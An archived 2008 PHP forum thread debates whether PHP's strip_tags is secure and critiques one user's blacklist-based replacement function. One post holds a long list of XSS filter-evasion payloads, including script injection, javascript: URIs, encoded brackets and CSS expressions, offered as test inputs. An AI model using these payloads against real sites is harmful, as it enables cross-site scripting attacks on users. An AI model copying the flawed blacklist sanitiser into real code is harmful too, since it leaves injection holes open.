PDA

Click to See Complete Forum and Search --> : Secure function for Strip tags! - Download

Y.P.Y
Nov 5th, 2008, 10:18 AM
______________________
the182guy
Nov 5th, 2008, 11:13 AM
Another one here. (http://uk.php.net/manual/en/function.strip-tags.php#86463)
Y.P.Y
Nov 5th, 2008, 11:31 AM
No, is not secure! Dont use. http://uk.php.net/manual/en/function.strip-tags.php#86463
the182guy
Nov 5th, 2008, 11:47 AM
Why is it not secure?

According to this (http://lists.horde.org/archives/dev/Week-of-Mon-20040712/014787.html) the strip_tags vulnerability was fixed in CVS in 2004.
kfcSmitty
Nov 5th, 2008, 12:30 PM
The only vulnerability I could find is listed here:

http://www.net-security.org/vuln.php?id=3570

And it has been fixed since then. What vulnerability are you talking about, Y.P.Y?
dclamp
Nov 5th, 2008, 06:07 PM
No, is not secure! Dont use. http://uk.php.net/manual/en/function.strip-tags.php#86463
This function works fine, The person who posted that note obviouly did something wrong.

it works perfectly fine for me

http://subsoft.net/personal/strip_tags.phps [Script File]
http://subsoft.net/personal/strip_tags.php


<?php
// a single very long <param> tag
$html =<<<EOF
<param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
...[snip]...
vie%20of%20All-Time"/>
EOF;

echo strip_tags($html, '<param>');
// this outputs an empty string
?>


outputs:

<param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
...[snip]...
vie%20of%20All-Time"/>
I_Love_My_Vans
Nov 6th, 2008, 03:44 AM
Another attempt by Y.P.Y to take over the world with unindented PHP code.

I agree with everyone else, it would appear any vulnerabilities were fixed long ago...


...however, keep going, and keep learning.
Y.P.Y
Nov 6th, 2008, 05:13 AM
Check with this value:

<script>alert(document.cookie)</script>
<IMG SRC="javascript:alert("XSS");">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("XSS")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert("XSS");">
<IMG SRC="jav&#x09;ascript:alert("XSS");">
<IMG SRC="jav&#x0A;ascript:alert("XSS");">
<IMG SRC="jav&#x0D;ascript:alert("XSS");">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
"
X
S
S
"
)
"
>
<IMG SRC="  javascript:alert("XSS");">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert("XSS");">
<BODY BACKGROUND="javascript:alert("XSS")">
<BODY ONLOAD=alert("XSS")>
<IMG DYNSRC="javascript:alert("XSS")">
<IMG LOWSRC="javascript:alert("XSS")">
<BGSOUND SRC="javascript:alert("XSS");">
<BR SIZE="&{alert("XSS")}">
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert("XSS")");}</STYLE><UL><LI>XSS
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">

?script?alert(?XSS?)?/script?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("XSS");">
<IFRAME SRC="javascript:alert("XSS");"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert("XSS");"></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<TABLE><TD BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="background-image:\0075\0072\006C\0028"\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053 \0053\0027\0029"\0029">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))">
<XSS STYLE="xss:expression(alert("XSS"))">
exp/*<A STYLE="no\xss:noxss("*//*");
xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))">
<STYLE>.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<SCRIPT>alert("XSS");</SCRIPT>
<BASE HREF="javascript:alert("XSS");//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("XSS")></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert("XSS");\")";
eval(a+b+c+d);
<HTML xmlns:xss>
<xss:xss>XSS</xss:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert("XSS");">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert("XSS")"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
<? echo("<SCR)";
echo("IPT>alert("XSS")</SCRIPT>"); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4-
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
<
%3C
&lt
&lt;
&LT
&LT;
<
<
<
<
<
<
<
<
<
<
<
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
I_Love_My_Vans
Nov 6th, 2008, 06:43 AM
...I think you broke the internet, you might need to amend your code tags...
kfcSmitty
Nov 6th, 2008, 08:29 AM
Yours trims out too much. It also doesn't have the ability to omit tags in the replace.

For example, if I was echoing something without the tags, I may want my code properly aligned in the background.

echo _Strip_Tag("<s\0\0cript>\n\ntesting");
echo strip_tags("<script>\n\ntesting<s\0cript>");

Your function will strip out the newline character, whereas the real strip_tags allows it.
dclamp
Nov 6th, 2008, 01:51 PM
@ YPY: The strip tags function is meant to strip tags, not to remove harmful javascript...
Y.P.Y
Nov 6th, 2008, 03:40 PM
Tag is all. Javascipt, HTML, VBScript...
visualAd
Nov 6th, 2008, 04:30 PM
Please, please invest some of your heard earned money in a "Beginning PHP 5" book.

function _Strip_Tag($Str_Input)
{
@settype($Str_Input, 'string'); ///// no need to do this and no need to prefix it with the error supression operator

$Str_Input= @strip_tags($Str_Input); //// again why are you using the error suspression operator?

// where did you get these from the hexadecimal numbers are not even valid
// HTML entities. The script tags would have been removed by strip tags as would the comments
$_Ary_TagsList= array('jav&#x0A;ascript:', 'jav&#x0D;ascript:', 'jav&#x09;ascript:', 'JaVaScRiPt:', 'JAVASCRIPT:', '<script>', '<SCRIPT>', '<script >', '<noscript>', '</script>', '<!-', '<', '>', '%3C', '&lt', '&lt;', '&LT', '&LT;', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '&#x3c', '&#x03c', '&#x003c', '&#x0003c', '&#x00003c', '&#x000003c', '&#x3c;', '&#x03c;', '&#x003c;', '&#x0003c;', '&#x00003c;', '&#x000003c;', '&#X3c', '&#X03c', '&#X003c', '&#X0003c', '&#X00003c', '&#X000003c', '&#X3c;', '&#X03c;', '&#X003c;', '&#X0003c;', '&#X00003c;', '&#X000003c;', '&#x3C', '&#x03C', '&#x003C', '&#x0003C', '&#x00003C', '&#x000003C', '&#x3C;', '&#x03C;', '&#x003C;', '&#x0003C;', '&#x00003C;', '&#x000003C;', '&#X3C', '&#X03C', '&#X003C', '&#X0003C', '&#X00003C', '&#X000003C', '&#X3C;', '&#X03C;', '&#X003C;', '&#X0003C;', '&#X00003C;', '&#X000003C;', '\x3c', '\x3C', '\u003c', '\u003C', chr(60), chr(62));
$Str_Input= @str_replace($_Ary_TagsList, '', $Str_Input);

// i've never seen anything so pointless in my life - what does this do
// except remove two new lines?
$Str_Input= @str_replace('

', '', $Str_Input);

// it was a string in the first place, why try and cast it back to a string?
return((string)$Str_Input);
}